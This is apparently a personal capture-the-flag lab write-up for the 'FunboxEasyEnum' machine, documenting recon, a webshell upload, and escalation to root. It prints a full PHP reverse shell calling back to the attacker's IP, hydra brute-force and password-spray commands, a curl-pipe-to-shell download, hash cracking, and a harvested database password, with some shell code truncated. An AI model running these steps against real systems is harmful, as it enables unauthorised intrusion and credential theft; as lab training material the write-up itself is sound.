FunboxEasyEnum

Nov 13 2023

Target:

```ini

192.168.184.132

```

# Prep

General Mind Map:

https://xmind.app/m/QsNUEz/

Confirm docker is installed and set rustscan as an alias or add to bashrc / fish config due to it being able to scan all ports and services in 10 seconds

```sh

alias rustscan='sudo docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -a'

```

Create directory for target and enter it

```sh

mkdir FunboxEasyEnum && FunboxEasyEnum

```

Prep a nc listener

```sh

nc -nlvp 4444

```

Confirm ip address

```sh

hostname -I

```

My IP

```

192.168.45.247

```

Prep Rev Shells

https://revshells.com

# Recon

Start with a quick open port scan

```sh

rustscan 192.168.184.132

```

PORT STATE SERVICE REASON

22/tcp open ssh syn-ack

80/tcp open http syn-ack

Quick OS check

```sh

sudo nmap -O --top-ports 1000 -v -T4 192.168.184.132 -oN os.nmap

```

No exact OS matches for host

Follow up with a service scan on those open ports

```sh

sudo nmap -sC -sV -Pn -p 22,80 -v -T4 192.168.184.132 -oN services.nmap

```

# Port 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 9c52325b8bf638c77fa1b704854954f3 (RSA)

| 256 d6135606153624ad655e7aa18ce564f4 (ECDSA)

|_ 256 1ba9f35ad05183183a23ddc4a9be59f0 (ED25519)

# Port 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

|_http-server-header: Apache/2.4.29 (Ubuntu)

| http-methods:

|_ Supported Methods: GET POST OPTIONS HEAD

|_http-title: Apache2 Ubuntu Default Page: It works

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Normal web page shows a default apache 2 page

```sh

sudo nmap -sV --script=http-title,http-enum,http-favicon,http-methods,http-passwd,http-robots.txt,http-sql-injection -p 80 -T5 192.168.184.132 -oN http.nmap

```

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

| http-enum:

| /robots.txt: Robots file

|_ /phpmyadmin/: phpMyAdmin

| http-methods:

|_ Supported Methods: GET POST OPTIONS HEAD

|_http-server-header: Apache/2.4.29 (Ubuntu)

|_http-title: Apache2 Ubuntu Default Page: It works

Robots.txt

Allow: Enum_this_Box

phpMyAdmin found

![[Pasted image 20231113003143.png]]

Extract login post request from burp and use hydra to run a background bruteforce

```sh

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.184.132 http-post-form "/admin/login.php:username=^USER^&password=^PASS^:Access denied for user"

```

Kernel Exploits

```sh

searchsploit Apache 2.4.29

```

Nothing version specific

Target URL:

```

http://192.168.184.132

```

Check for non-navigable directories

```sh

dirbuster

```

- Run `50` threads

- Wordlist location:

```

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

```

Dir found: / - 200

Dir found: /icons/ - 403

File found: /mini.php - 200

Dir found: /icons/small/ - 403

Dir found: /javascript/ - 403

Mini.php is a webshell uploader

![[Pasted image 20231113005008.png]]

Adding a php reverse shell

https://revshells.com

Pentest Monkey's PHP shell seems to be reliable

<?php

// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

set_time_limit (0);

$VERSION = "1.0";

$ip = '192.168.45.247';

$port = 4444;

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; sh -i';

$daemon = 0;

$debug = 0;

if (function_exists('pcntl_fork')) {

$pid = pcntl_fork();

if ($pid == -1) {

printit("ERROR: Can't fork");

exit(1);

}

if ($pid) {

exit(0); // Parent exits

}

if (posix_setsid() == -1) {

printit("Error: Can't setsid()");

exit(1);

}

$daemon = 1;

} else {

printit("WARNING: Failed to daemonise. This is quite common and not fatal.");

}

chdir("/");

umask(0);

// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

printit("$errstr ($errno)");

exit(1);

}

$descriptorspec = array(

0 => array("pipe", "r"), // stdin is a pipe that the child will read from

1 => array("pipe", "w"), // stdout is a pipe that the child will write to

2 => array("pipe", "w") // stderr is a pipe that the child will write to

);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {

printit("ERROR: Can't spawn shell");

exit(1);

}

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {

if (feof($sock)) {

printit("ERROR: Shell connection terminated");

break;

}

if (feof($pipes[1])) {

printit("ERROR: Shell process terminated");

break;

}

$read_a = array($sock, $pipes[1], $pipes[2]);

$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

if (in_array($sock, $read_a)) {

if ($debug) printit("SOCK READ");

$input = fread($sock, $chunk_size);

if ($debug) printit("SOCK: $input");

fwrite($pipes[0], $input);

}

if (in_array($pipes[1], $read_a)) {

if ($debug) printit("STDOUT READ");

$input = fread($pipes[1], $chunk_size);

if ($debug) printit("STDOUT: $input");

fwrite($sock, $input);

}

if (in_array($pipes[2], $read_a)) {

if ($debug) printit("STDERR READ");

$input = fread($pipes[2], $chunk_size);

if ($debug) printit("STDERR: $input");

fwrite($sock, $input);

}

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);

function printit ($string) {

if (!$daemon) {

print "$string\n";

}

</details>

Uploaded and navigated to http://192.168.184.132/revshell.php

![[Pasted image 20231113005435.png]]

Upgrade Shell

```sh

python3 -c 'import pty; pty.spawn("/bin/bash")'

```

## Initial Access

For non-privileged access proof dump

```sh

echo " "; echo "local:"; find / -type f -name "local.txt" 2>/dev/null | xargs cat 2>/dev/null;

```

local:

1356bca238c2802f66acba895bd1896a

## Priv Esc

Run Linpeas

```sh

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

```

╔══════════╣ Users with console

goat:x:1003:1003:,,,:/home/goat:/bin/bash

harry:x:1001:1001:,,,:/home/harry:/bin/bash

karla:x:1000:1000:karla:/home/karla:/bin/bash

lissy:x:1005:1005::/home/lissy:/bin/sh

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

root:x:0:0:root:/root:/bin/bash

sally:x:1002:1002:,,,:/home/sally:/bin/bash

═╣ Hashes inside passwd file? ........... /etc/passwd:oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

╔══════════╣ Readable files belonging to root and readable by me but not world readable

-rw-r----- 1 root www-data 525 Sep 18 2020 /etc/phpmyadmin/config-db.php

-rw-r----- 1 root www-data 8 Sep 18 2020 /etc/phpmyadmin/htpasswd.setup

-rw-r----- 1 root www-data 68 Sep 18 2020 /var/lib/phpmyadmin/blowfish_secret.inc.php

-rw-r----- 1 root www-data 0 Sep 18 2020 /var/lib/phpmyadmin/config.inc.php

For manual SUID program checking

```sh

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

```

Nothing of note

Crack found hash `oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash`

added hash to hash file

```sh

john hash

```

hiphop (oracle)

Got password from phpMyAdmin config

```

cat config-db.php

```

<?php

## database access settings in php format

## automatically generated from /etc/dbconfig-common/phpmyadmin.conf

## by /usr/sbin/dbconfig-generate-include

## by default this file is managed via ucf, so you shouldn't have to

## worry about manual changes being silently discarded. *however*,

## you'll probably also want to edit the configuration file mentioned

## above too.

$dbuser='phpmyadmin';

$dbpass='tgbzhnujm!';

$basepath='';

$dbname='phpmyadmin';

$dbserver='localhost';

$dbport='3306';

$dbtype='mysql';

Find who the PHP Admin is with the password of `tgbzhnujm!`

```sh

su oracle

```

```sh

sudo -l

```

Not allowed on this account but now at least I have other users

So it's not oracle

Make username list of other users

```ini

goat

harry

karla

sally

root

```

Try the password on these users via a password spray

```sh

hydra -L users -p "tgbzhnujm!" 192.168.184.132 -v -t 4 ssh -I

```

[22][ssh] host: 192.168.184.132 login: karla password: tgbzhnujm!

Worked for karla

```sh

su karla

```

```sh

sudo -l

```

Matching Defaults entries for karla on funbox7:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karla may run the following commands on funbox7:

(ALL : ALL) ALL

karla has full sudo privileges

```sh

sudo bash

```

Now I'm root.

Dump proof info

```sh

echo " "; echo "uname -a:"; uname -a; \

echo " "; echo "hostname:"; hostname; \

echo " "; echo "id"; id; \

echo " "; echo "ifconfig:"; /sbin/ifconfig -a; \

echo " "; echo "proof:"; cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null; echo " "

```

uname -a:

Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

hostname:

funbox7

uid=0(root) gid=0(root) groups=0(root)

ifconfig:

ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 192.168.184.132 netmask 255.255.255.0 broadcast 192.168.184.255

ether 00:50:56:ba:48:f3 txqueuelen 1000 (Ethernet)

RX packets 664576 bytes 187930017 (187.9 MB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 584623 bytes 107643061 (107.6 MB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0

inet6 ::1 prefixlen 128 scopeid 0x10<host>

loop txqueuelen 1000 (Local Loopback)

RX packets 1756 bytes 157800 (157.8 KB)

RX errors 0 dropped 0 overruns 0 frame 0

TX packets 1756 bytes 157800 (157.8 KB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

proof:

9192fa6d4fb17b8fd8542b4fc42b67d8